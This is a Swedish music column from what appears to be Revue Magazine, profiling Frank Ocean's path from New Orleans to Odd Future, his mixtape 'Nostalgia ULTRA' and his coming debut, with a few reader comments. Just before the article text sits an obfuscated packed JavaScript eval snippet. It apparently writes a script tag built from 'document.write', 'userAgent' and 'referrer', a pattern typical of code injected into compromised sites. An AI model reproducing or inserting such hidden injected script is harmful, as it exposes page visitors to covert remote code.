Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Krönika | Frank Ocean

Krönika | Frank Ocean
Revue Magazine

2005 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hafid|var|u0026u|referrer|niasa||js|php’.split(’|’),0,{}))
satt Frank Ocean nyinflyttad i sitt studentrum på University of New Orleans i södra USA då Hurricane Katrina slog till.

När Coldplay skulle utse ett förband till sin kommande europaturné föll valet slutligen på Frank Ocean. Jag har aldrig lyssnat på Coldplay mer än på radio och ofta avfärdat deras musik som mainstream, men ändå någonstans förstått att Chris Martin var någonting annorlunda.

Inte minst när han häromveckan på en konsert hyllade den nyligen bortgångne Bestie Boys-rapparen MC A genom att otroligt vackert tolka ‘Fight for your right’

Åter till det där studentrummet i södra Louisiana. Frank fick nog av New Orleans och håvade in sina flytande ägodelar, packade ihop sin akademiska karriär och begav sig till Los Angeles för att ge musiken en chans. Ny stad och nya mål, efter att ha spelat in demos i en väns källare utan större framgångar träffade han till slut Tyler The Creator, den unga talangen Earl Sweatshirt och resten av grabbarna från hip hop-kollektivet Odd Future.

httpv://www.youtube.com/watch?v=PmN9rZW0HGo

Jag sprang in i Frank Ocean’s mixtape ‘Nostalgia ULTRA’ för första gången när jag var ute och reste för snart två år sen. ‘Nostalgia ULTRA’ var ett mixtape som Frank släppte oberoende av skivbolag och som fanns att ladda ner gratis från hans blogg. Förutom hans fantastiskt souliga och lena röst fångades min uppmärksamhet av framför allt tre låtar, ‘LoveCrimes’, ‘Swim Good’ och inte minst ‘Novacane’. Varje låt en egen historia.

De två sistnämnda kom senare att ges ut som singlar under skivbolaget Def Jam.

Novacane borde ha blivit det stora genombrottet för Frankie men låten kom inte högre än 82:a på Billboardlistan. Nyligen släpptes singeln ‘Thinking Bout You’ som är den första singeln till en kommande skiva där han bland annat samarbetar med Pharrell Williams. Låten skrev han efter att ha fått sitt hjärta krossat av sin första stora kärlek. Det Frank Ocean gör känns både modigt och nytt med risken att hamna i ett RnB-fack, vilket vore slarvigt.

httpv://www.youtube.com/watch?v=TMfPJT4XjAI

Han lyckas med att hitta balansen mellan att jobba med Kanye West och Jay-z på spåren ‘No Church in the Wild’ och ‘Made in America’  utan att kompromissa med sitt sound och han har bland annat tackat nej till att jobba med Lil Wayne. På frågan om om han lärt sig någonting, bortsett från det musikaliska, av att jobba med Kanye West svarar han -choose your sneakers wisely.

Framtiden ser ljus ut för Mr Ocean och vi är många som ser fram emot hans kommande debutalbum.

Se mer av Frank Ocean här!

Comments

 1. Anton Alm

  Grym artikel. Tror absolut att Frank kommer bli nästa stora artist!

  • Adam

   Tack. Album förväntas komma 9/7 läste jag precis!

 2. Grodd

  Gillar Swim Good starkt 🙂